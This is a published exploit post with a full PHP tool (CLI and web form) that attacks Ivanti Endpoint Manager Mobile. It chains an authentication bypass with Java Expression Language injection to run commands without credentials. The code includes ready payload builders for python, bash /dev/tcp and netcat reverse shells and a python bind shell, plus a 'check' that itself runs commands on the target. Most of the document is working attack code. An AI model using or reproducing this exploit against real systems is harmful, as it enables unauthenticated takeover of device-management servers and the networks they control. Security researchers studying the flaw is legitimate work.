Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection

=============================================================================================================================================
| # Title : Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection |

=============================================================================================================================================
| # Title : Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ivanti.com/products/endpoint-manager-mobile |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/200146/ & CVE-2025-4427, CVE-2025-4428

[+] Summary :

The exploit chains two critical vulnerabilities in Ivanti EPMM (the title build, 12.5.0.0, is the one tested; consult the vendor advisory for the affected and fixed version ranges):
CVE-2025-4427 - Authentication Bypass: lets an unauthenticated request reach the API endpoint.
CVE-2025-4428 - Expression Language Injection: the `format` query parameter of /mifs/rs/api/v2/featureusage is evaluated as Java Expression Language (EL).
Together they let an unauthenticated attacker execute arbitrary OS commands on the appliance,
with the command's standard output returned in the HTTP response body.

[+] Exploitation Mechanism

Endpoint: the exploit sends an unauthenticated GET to /mifs/rs/api/v2/featureusage.

Payload Injection: the Java EL expression is URL-encoded into the `format` query parameter.

Command Execution: the expression uses reflection (''.getClass().forName(...)) to reach java.lang.Runtime.getRuntime().exec(). Note that Runtime.exec(String) splits the command on whitespace and does not go through a shell, so pipelines, `;`-separated command lists and quoted one-liners are not interpreted the way a shell would.

Result Extraction: the process stdout is wrapped in a java.util.Scanner with the `\A` delimiter, so next() returns the whole stream; that text lands in the HTTP response body.
[+] POC :

php poc.php (CLI) or http://127.0.0.1/poc.php (web form). The web form has no authentication or CSRF protection, so serve it only on a loopback/private listener and never on a reachable web server.

php poc.php -t target.com -c

php poc.php -t 192.168.1.100 -P command

php poc.php -t target.com -P reverse_shell -H YOUR_IP -L 4444

<?php
/*
* by indoushka
* CVE-2025-4427, CVE-2025-4428 - Ivanti EPMM RCE Exploit
*/

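/**
 * CVE-2025-4427 (authentication bypass) + CVE-2025-4428 (EL injection) against Ivanti EPMM.
 *
 * Every request is an unauthenticated GET to /mifs/rs/api/v2/featureusage with the EL
 * expression in the `format` query parameter; the command's stdout is read back through
 * java.util.Scanner and returned in the HTTP body. Note that check() is itself code
 * execution on the target (it runs `id`), not a passive version fingerprint.
 */
class IvantiEPMMExploit
{
    /** @var string Host name or IP address of the EPMM instance (no scheme, no port). */
    private $target;
    /** @var int TCP port the request is sent to. */
    private $port;
    /** @var bool true => https://, false => http:// */
    private $ssl;
    /** @var string Path prefix (trailing slash removed) prepended to the API path. */
    private $base_path;
    /** @var int Overall request timeout in seconds. */
    private $timeout;

    /**
     * @param string $target    Host or IP; a bare IPv6 literal is bracketed by build_url().
     * @param int    $port      TCP port (default 443). Cast to int because it comes from CLI/form input.
     * @param bool   $ssl       Use https when true.
     * @param string $base_path Base URI if EPMM sits behind a path-prefixing reverse proxy; '/' for none.
     */
    public function __construct($target, $port = 443, $ssl = true, $base_path = '/')
    {
        $this->target = (string)$target;
        $this->port = (int)$port;
        $this->ssl = (bool)$ssl;
        $this->base_path = rtrim((string)$base_path, '/');
        $this->timeout = 30;
    }

    /**
     * Vulnerability check.
     *
     * This is not a passive probe: it sends the EL payload with the command `id` and
     * looks for "uid=" and "gid=" in the response body. "safe" therefore only means
     * the marker did not come back (patched build, WAF, exec() blocked, output not
     * reflected) -- it is not proof of absence. "unknown" means no HTTP response at all.
     *
     * @return string "vulnerable" | "safe" | "unknown"
     */
    public function check()
    {
        echo "[*] Checking Ivanti EPMM vulnerability...\n";

        $response = $this->execute_command('id');

        if ($response === false || $response === '') {
            echo "[-] Failed to get response from target\n";
            return "unknown";
        }

        $has_marker = strpos($response, 'uid=') !== false
            && strpos($response, 'gid=') !== false;

        if ($has_marker) {
            echo "[+] ? Target is vulnerable!\n";
            return "vulnerable";
        }

        echo "[-] ? Target is not vulnerable\n";
        return "safe";
    }

    /**
     * Send one EL-injection request carrying $command and return the raw response body.
     *
     * The payload travels in the `format` query parameter of /mifs/rs/api/v2/featureusage
     * (CVE-2025-4428); no credentials are sent (CVE-2025-4427). The HTTP status is
     * printed but not returned, so callers judge success from the body alone.
     *
     * @param string $command Command string handed to Runtime.exec(); see build_el_payload() for its limits.
     * @return string|false Response body, or false when curl could not complete the request.
     */
    private function execute_command($command)
    {
        $payload = $this->build_el_payload($command);
        $url = $this->build_url('/mifs/rs/api/v2/featureusage') . '?format=' . urlencode($payload);

        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => $this->timeout,
            CURLOPT_CONNECTTIMEOUT => 10,
            // Appliances are usually deployed with self-signed certificates, so
            // verification is deliberately off. Consequence: anyone on path can read
            // the payload, including a reverse-shell listener address embedded in it.
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            // The payload sits in the query string, so every followed redirect re-sends
            // it to whatever Location says (possibly a different host). Keep following
            // for http->https style hops, but cap the chain instead of chasing it.
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_MAXREDIRS => 3,
            CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        ]);

        $response = curl_exec($ch);

        if ($response === false) {
            // Surface the transport error instead of returning false silently.
            echo "[-] Request failed: " . curl_error($ch) . "\n";
            curl_close($ch);
            return false;
        }

        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        echo "[*] HTTP Status: $http_code\n";

        return $response;
    }

    /**
     * Build the Expression Language injection payload around $command.
     *
     * $command is embedded as an EL single-quoted string literal, so backslash and
     * single quote are escaped (otherwise a command containing quotes -- every
     * one-liner in generate_reverse_shell() does -- breaks the expression instead of
     * running). Caveat that the escaping does NOT remove: Runtime.exec(String)
     * tokenises on whitespace and never invokes a shell, so `;`, `|` and quoting
     * inside $command are passed to the first token as literal arguments.
     *
     * `'\\A'` in the EL literal decodes to the Java string "\A" -- the "beginning of
     * input" regex anchor -- which is the standard trick to make Scanner.next() return
     * the entire stdout stream.
     *
     * @param string $command Command string for Runtime.exec().
     * @return string The `${...}` expression, not URL-encoded.
     */
    private function build_el_payload($command)
    {
        // Order matters: escape backslashes first so the quote escapes are not doubled.
        $literal = str_replace(['\\', "'"], ['\\\\', "\\'"], (string)$command);

        return "\${''.getClass().forName('java.util.Scanner')"
            . ".getConstructor(''.getClass().forName('java.io.InputStream'))"
            . ".newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null)"
            . ".exec('{$literal}').getInputStream())"
            . ".useDelimiter('\\\\A').next()}";
    }

    /**
     * Main exploit execution: build the OS command for $payload_type and send it once.
     *
     * "Success" only means the HTTP request completed and returned a body. For
     * reverse_shell/bind_shell the operator still has to confirm the connection on the
     * listener side; nothing here verifies that the command actually ran.
     *
     * @param string      $payload_type 'reverse_shell' | 'bind_shell' | 'command'; anything else falls back to `id; whoami`.
     * @param string|null $lhost        Listener host (reverse_shell only).
     * @param int|null    $lport        Listener port (reverse_shell) or bind port (bind_shell).
     * @return bool
     */
    public function exploit($payload_type = 'reverse_shell', $lhost = null, $lport = null)
    {
        echo "[*] Starting Ivanti EPMM exploitation...\n";

        $payload_cmd = $this->generate_payload($payload_type, $lhost, $lport);

        if ($payload_cmd === false || $payload_cmd === '') {
            echo "[-] Failed to generate payload\n";
            return false;
        }

        echo "[*] Executing payload...\n";
        $response = $this->execute_command($payload_cmd);

        if ($response) {
            echo "[+] ? Payload sent successfully\n";
            echo "[*] Check your reverse connection\n";
            return true;
        }

        echo "[-] ? Failed to execute payload\n";
        return false;
    }

    /**
     * Map a payload type name to the OS command string that will be sent.
     *
     * Listener host/port are validated here because they are interpolated verbatim
     * into a double-quoted python string; a stray quote would silently produce a
     * broken one-liner rather than a shell.
     *
     * @param string      $type  'reverse_shell' | 'bind_shell' | 'command' | other.
     * @param string|null $lhost Listener host for reverse_shell.
     * @param mixed       $lport Listener/bind port (string from CLI/form or int).
     * @return string|false Command string, or false when required input is missing or invalid.
     */
    private function generate_payload($type, $lhost, $lport)
    {
        switch ($type) {
            case 'reverse_shell':
                if (!$lhost || !$lport) {
                    echo "[-] IP and port required for reverse shell\n";
                    return false;
                }
                if (!$this->valid_host($lhost) || !$this->valid_port($lport)) {
                    return false;
                }
                return $this->generate_reverse_shell($lhost, (int)$lport);

            case 'bind_shell':
                if (!$lport) {
                    echo "[-] Port required for bind shell\n";
                    return false;
                }
                if (!$this->valid_port($lport)) {
                    return false;
                }
                return $this->generate_bind_shell((int)$lport);

            case 'command':
                return 'id; whoami; uname -a; pwd';

            default:
                return 'id; whoami';
        }
    }

    /**
     * True when $port is an integer in 1..65535; prints an error (without echoing the
     * offending value, which may be rendered into a web page) otherwise.
     *
     * @param mixed $port
     * @return bool
     */
    private function valid_port($port)
    {
        $range = ['options' => ['min_range' => 1, 'max_range' => 65535]];
        $ok = filter_var($port, FILTER_VALIDATE_INT, $range) !== false;
        if (!$ok) {
            echo "[-] Invalid port (must be a number between 1 and 65535)\n";
        }
        return $ok;
    }

    /**
     * True when $host is made only of hostname/IP characters (letters, digits, '.',
     * ':' and '-'); anything else could break out of the python string literal.
     *
     * @param mixed $host
     * @return bool
     */
    private function valid_host($host)
    {
        $ok = preg_match('/^[A-Za-z0-9.:\-]+$/', (string)$host) === 1;
        if (!$ok) {
            echo "[-] Invalid listener host (use letters, digits, '.', ':' or '-')\n";
        }
        return $ok;
    }

    /**
     * Generate a reverse-shell one-liner connecting back to $lhost:$lport.
     *
     * Three variants are kept for manual swapping; only the python one is returned.
     * See build_el_payload() for why the bash/nc variants (which rely on shell
     * parsing of their own arguments) are unlikely to behave as written under
     * Runtime.exec(String).
     *
     * @param string $lhost Validated listener host.
     * @param int    $lport Validated listener port.
     * @return string
     */
    private function generate_reverse_shell($lhost, $lport)
    {
        $shells = [
            'python' => "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{$lhost}\",{$lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'",
            'bash' => "bash -c 'bash -i >& /dev/tcp/{$lhost}/{$lport} 0>&1'",
            'nc' => "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$lhost} {$lport} >/tmp/f",
        ];

        return $shells['python'];
    }

    /**
     * Generate a python bind-shell one-liner listening on 0.0.0.0:$lport.
     *
     * @param int $lport Validated port.
     * @return string
     */
    private function generate_bind_shell($lport)
    {
        return "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"0.0.0.0\",{$lport}));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0); os.dup2(conn.fileno(),1); os.dup2(conn.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'";
    }

    /**
     * Build the full URL for $path: scheme://host:port + base_path + path.
     *
     * @param string $path Absolute path starting with '/'.
     * @return string
     */
    private function build_url($path)
    {
        $scheme = $this->ssl ? 'https' : 'http';
        $host = $this->target;

        // A bare IPv6 literal must be bracketed in the URL authority or curl reads
        // the first ':' as the port separator.
        if (strpos($host, ':') !== false && $host[0] !== '[') {
            $host = "[{$host}]";
        }

        return "{$scheme}://{$host}:{$this->port}{$this->base_path}{$path}";
    }
}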

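// CLI Interface
if (php_sapi_name() === 'cli') {
    // The original ASCII-art banner was mis-encoded in this copy; print a plain one.
    echo "\nIvanti EPMM RCE Exploit - PHP Implementation\n\n";

    // 's' and 'c' are flags and take no value: with a trailing ':' getopt demands a
    // value and silently drops a bare `-c`, so `-t host -c` ran the exploit instead of
    // the check. '--no-ssl' is added because the help text documents SSL as the
    // default; '-s/--ssl' are kept as accepted no-ops for backward compatibility.
    $options = getopt("t:p:su:cP:L:H:", [
        "target:",
        "port:",
        "ssl",
        "no-ssl",
        "uri:",
        "check",
        "payload:",
        "lhost:",
        "lport:",
    ]);

    $target = $options['t'] ?? $options['target'] ?? null;
    $port = $options['p'] ?? $options['port'] ?? 443;
    $ssl = !isset($options['no-ssl']);
    $base_uri = $options['u'] ?? $options['uri'] ?? '/';
    $check_only = isset($options['c']) || isset($options['check']);
    $payload_type = $options['P'] ?? $options['payload'] ?? 'command';
    $lhost = $options['H'] ?? $options['lhost'] ?? null;
    $lport = $options['L'] ?? $options['lport'] ?? 4444;

    if (!$target) {
        echo "Usage: php poc.php [options]\n";
        echo "Options:\n";
        echo " -t, --target Target host (required)\n";
        echo " -p, --port Target port (default: 443)\n";
        echo " -s, --ssl Use SSL (default: true)\n";
        echo " --no-ssl Use plain HTTP instead of SSL\n";
        echo " -u, --uri Base URI path (default: /)\n";
        echo " -c, --check Check only (don't exploit)\n";
        echo " -P, --payload Payload type: command, reverse_shell, bind_shell (default: command)\n";
        echo " -H, --lhost Listener host for reverse shell\n";
        echo " -L, --lport Listener port for reverse shell (default: 4444)\n";
        echo "\nExamples:\n";
        echo " php poc.php -t 192.168.1.100 -c\n";
        echo " php poc.php -t target.com -P reverse_shell -H 10.0.0.5 -L 4444\n";
        exit(1);
    }

    $exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);

    if ($check_only) {
        $result = $exploit->check();
        echo "\n[*] Result: {$result}\n";
    } elseif ($exploit->exploit($payload_type, $lhost, $lport)) {
        echo "[+] Exploitation completed successfully\n";
    } else {
        echo "[-] Exploitation failed\n";
    }

} else {
    // Web Interface.
    //
    // SECURITY: this page has no authentication and no CSRF token. Anyone who can reach
    // it -- or make the operator's browser POST to it from another site -- can point the
    // exploit at any host of their choosing. Serve it only on a loopback/private
    // listener, never on a reachable web server, and remove it after the engagement.
    $action = $_POST['action'] ?? '';

    if ($action === 'check' || $action === 'exploit') {
        $target = trim((string)($_POST['target'] ?? ''));
        // Port is interpolated into the URL authority; keep it numeric.
        $port = (int)($_POST['port'] ?? 443);
        $ssl = isset($_POST['ssl']);
        $base_uri = (string)($_POST['uri'] ?? '/');
        $payload_type = (string)($_POST['payload_type'] ?? 'command');
        $lhost = (string)($_POST['lhost'] ?? '');
        $lport = $_POST['lport'] ?? 4444;

        $error_style = 'color: red; padding: 10px; border: 1px solid red; margin: 10px;';

        if ($target === '') {
            echo "<div style='{$error_style}'>Target host is required</div>";
        } elseif ($port < 1 || $port > 65535) {
            echo "<div style='{$error_style}'>Port must be a number between 1 and 65535</div>";
        } else {
            $exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);

            ob_start();
            if ($action === 'check') {
                $exploit->check();
            } else {
                $exploit->exploit($payload_type, $lhost, $lport);
            }
            $output = ob_get_clean();

            // Escape before rendering: the captured text holds fixed status strings
            // today, but it is exactly where target-controlled output would end up, and
            // a hostile target must not be able to put script into the operator's browser.
            $safe_output = htmlspecialchars($output, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            echo "<pre style='background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;'>{$safe_output}</pre>";
        }

        // Show the form again after execution
        $self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');
        echo '<a href="' . $self . '" style="display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;">Back to Form</a>';
    } else {
        // Display the form (nowdoc: no interpolation happens in this markup).
        echo <<<'HTML'
<!DOCTYPE html>
<html>
<head>
<title>Ivanti EPMM RCE Exploit</title>
<meta charset="UTF-8">
<style>
body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 20px;
    background: #f5f5f5;
}
.container {
    max-width: 800px;
    margin: 0 auto;
    background: white;
    padding: 30px;
    border-radius: 8px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}
h1 {
    color: #333;
    border-bottom: 2px solid #007cba;
    padding-bottom: 10px;
}
h3 {
    color: #666;
}
.form-group {
    margin-bottom: 20px;
}
label {
    display: block;
    margin-bottom: 8px;
    font-weight: bold;
    color: #333;
}
input[type="text"], select {
    width: 100%;
    padding: 10px;
    border: 1px solid #ddd;
    border-radius: 4px;
    box-sizing: border-box;
    font-size: 14px;
}
.checkbox-group {
    display: flex;
    align-items: center;
    gap: 10px;
}
button {
    background: #007cba;
    color: white;
    padding: 12px 25px;
    border: none;
    border-radius: 4px;
    cursor: pointer;
    margin-right: 10px;
    font-size: 16px;
    transition: background 0.3s;
}
button:hover {
    background: #005a87;
}
.danger {
    background: #dc3545;
}
.danger:hover {
    background: #c82333;
}
.info {
    background: #17a2b8;
}
.info:hover {
    background: #138496;
}
.warning-box {
    background: #fff3cd;
    border: 1px solid #ffeaa7;
    color: #856404;
    padding: 15px;
    border-radius: 4px;
    margin: 20px 0;
}
.info-box {
    background: #d1ecf1;
    border: 1px solid #bee5eb;
    color: #0c5460;
    padding: 15px;
    border-radius: 4px;
    margin: 20px 0;
}
</style>
</head>
<body>
<div class="container">
<h1>Ivanti EPMM RCE Exploit</h1>
<h3>CVE-2025-4427 &amp; CVE-2025-4428 - Authentication Bypass &amp; RCE</h3>

<div class="warning-box">
<strong>Warning:</strong> This tool is for educational and authorized penetration testing purposes only. Unauthorized use is illegal. This form has no authentication or CSRF protection: serve it only on a loopback or private listener.
</div>

<form method="post">
<div class="form-group">
<label for="target">Target Host:</label>
<input type="text" id="target" name="target" placeholder="192.168.1.100 or target.com" required>
</div>

<div class="form-group">
<label for="port">Port:</label>
<input type="text" id="port" name="port" value="443">
</div>

<div class="form-group">
<label for="uri">Base URI:</label>
<input type="text" id="uri" name="uri" value="/">
</div>

<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="ssl" name="ssl" checked>
<label for="ssl" style="display: inline; font-weight: normal;">Use SSL</label>
</div>
</div>

<div class="form-group">
<label for="payload_type">Payload Type:</label>
<select id="payload_type" name="payload_type">
<option value="command">Test Command (id; whoami)</option>
<option value="reverse_shell">Reverse Shell</option>
<option value="bind_shell">Bind Shell</option>
</select>
</div>

<div class="form-group">
<label for="lhost">Listener Host (for reverse shell):</label>
<input type="text" id="lhost" name="lhost" placeholder="Your IP address: 192.168.1.100">
</div>

<div class="form-group">
<label for="lport">Listener Port (for reverse shell):</label>
<input type="text" id="lport" name="lport" value="4444">
</div>

<button type="submit" name="action" value="check" class="info">Check Vulnerability</button>
<button type="submit" name="action" value="exploit" class="danger">Execute Exploit</button>
</form>

<div class="info-box">
<h3>About CVE-2025-4427 &amp; CVE-2025-4428:</h3>
<p><strong>Vulnerability:</strong> Authentication Bypass + Expression Language Injection</p>
<p><strong>Affected Products:</strong> Ivanti EPMM, MobileIron Core</p>
<p><strong>Impact:</strong> Unauthenticated Remote Code Execution</p>
<p><strong>Endpoint:</strong> /mifs/rs/api/v2/featureusage</p>
<p><strong>CVSS Score:</strong> 9.8 (Critical)</p>
</div>
</div>
</body>
</html>
HTML;
    }
}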
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================